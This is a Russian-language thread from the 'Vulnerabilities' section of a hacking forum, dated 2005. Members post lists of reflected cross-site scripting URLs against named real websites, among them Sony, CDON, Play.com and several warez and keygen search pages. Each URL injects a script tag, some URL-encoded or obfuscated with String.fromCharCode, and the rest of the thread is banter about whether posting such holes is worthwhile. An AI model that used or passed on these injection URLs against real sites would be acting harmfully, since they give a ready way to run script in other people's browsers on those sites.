Xss баги на забугорных сайтах...

Discussion in 'Уязвимости' started by x-ultra-x, 6 Oct 2005.

  1. x-ultra-x

    x-ultra-x Elder - Старейшина

    Joined:
    5 Oct 2005
    Messages:
    45
    Likes Received:
    7
    Reputations:
    -2
    1)http://www.keygen.us/
    http://www.keygen.us/search.shtml?q=<script>alert('Hello!')</script>&w=cracks

    2)http://www.serials.ws
    В поле для поиска крэка вбиваем: <script>alert('Hello!')</script>

    3)http://cracks.thebugs.ws/
    аналогично:
    http://cracks.thebugs.ws/search.shtml?q=<script>alert(String.fromCharCode(72,73));</script>

    4)http://www.warez.com
    Даже на таком известном ресурсе промелькнула дырка:
    http://search.warez.com/?q=<script%...=web&e=web

    5)http://www.rom-world.com/search/?q=<script>alert('Hello!')</script>&submit.x=8&submit.y=9

    6)http://www.avatarity.com/search.php?sch=<script>alert(String.fromCharCode(72,73));</script>&oper=or
     
    #1 x-ultra-x, 6 Oct 2005
    1 person likes this.
  2. SladerNon

    SladerNon Адам

    Joined:
    6 Mar 2005
    Messages:
    1,636
    Likes Received:
    941
    Reputations:
    355
    Молодец, совсем не плохо для первого поста! =) +5 от меня.
     
    #2 SladerNon, 6 Oct 2005
  3. Puff

    Puff ---

    Joined:
    22 Nov 2004
    Messages:
    337
    Likes Received:
    62
    Reputations:
    40
    Да вы что???
    Нахрена такое создавать??? Тут же уйму сайтов можно выложить!
    Комо это надо???
     
    #3 Puff, 6 Oct 2005
  4. bul666

    bul666 Banned

    Joined:
    21 Apr 2005
    Messages:
    280
    Likes Received:
    8
    Reputations:
    -1
    Абсолютно согласен!
     
    #4 bul666, 6 Oct 2005
  5. Puff

    Puff ---

    Joined:
    22 Nov 2004
    Messages:
    337
    Likes Received:
    62
    Reputations:
    40
    #5 Puff, 6 Oct 2005
  6. PinkPanther

    PinkPanther [ розовый мафиозо ]

    Joined:
    16 Mar 2005
    Messages:
    280
    Likes Received:
    75
    Reputations:
    85
    Именно так набирается опыт у новичков, а пост сообщений на паблик придает стимула для дальнейших исследований, так что не надо хаить!!!! Хотя у нас это было совсем подругому....
     
    #6 PinkPanther, 7 Oct 2005
  7. x-ultra-x

    x-ultra-x Elder - Старейшина

    Joined:
    5 Oct 2005
    Messages:
    45
    Likes Received:
    7
    Reputations:
    -2
    Все когда-то начинали разве нет?(А кто раньше начал тот и быстрее закончит) Так что это только начало...
     
    #7 x-ultra-x, 7 Oct 2005
  8. Puff

    Puff ---

    Joined:
    22 Nov 2004
    Messages:
    337
    Likes Received:
    62
    Reputations:
    40
    Да?! хех, ну на тебе на "известных"(как ты воразился) сайтах ХСС! Тока нахер они нужны то?! :) Так пол инэта можно в этом топике запосить! Глупо!

    http://www.sony.com/SonySearch/Search.jsp?mode=go&pst=&pti=0&psti=0&st=%22%3E%3Cscript%3Ealert%28%2FPuff%2F%29%3B%3C%2Fscript%3E&ti=0 (www.sony.com)


    http://www.cdon.com/search_result.phtml?ed_search_value=%27%3E%3Cscript%3Ealert%28%2FPuff%2F%29%3C%2Fscript%3E&btn_search=Search+%BB&sl_search_field=artist (www.CDon.com)



    http://65.222.158.141/search?q=%3Cscript%3Ealert%28/Puff/%29%3B%3C/script%3E&output=xml_no_dtd&site=cam-es&client=frontend_cam_es&restrict=cam-es&oe=UTF-8&ie=UTF-8&proxystylesheet=frontend_cam_es&filter=p (www.SonyEricsson.com)


    http://www.sgifaq.com/cgi-bin/faq/smartfaq.cgi?keywords=%3Cscript%3Ealert%28/Puff/%29%3B%3C%2Fscript%3E&search=Answer&match=all (www.sgifaq.com)


    http://play.com/play247.asp?pa=search&searchtype=allproducts&searchstring=%22%3E%3Cscript%3Ealert%28/Puff/%29%3B%3C%2Fscript%3E&page=search (www.play.com)

    Это понимать как??? типа ты флудить на форуме будешь?! :)) А это былоо так, для начала! :p

    Ну да, наверное ты прав! Пусть побалуются! :)) как говориться: "Чем бы дитя не тешилось - лишь бы не ВЕШАЛОСЬ" :)))
     
    #8 Puff, 7 Oct 2005
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.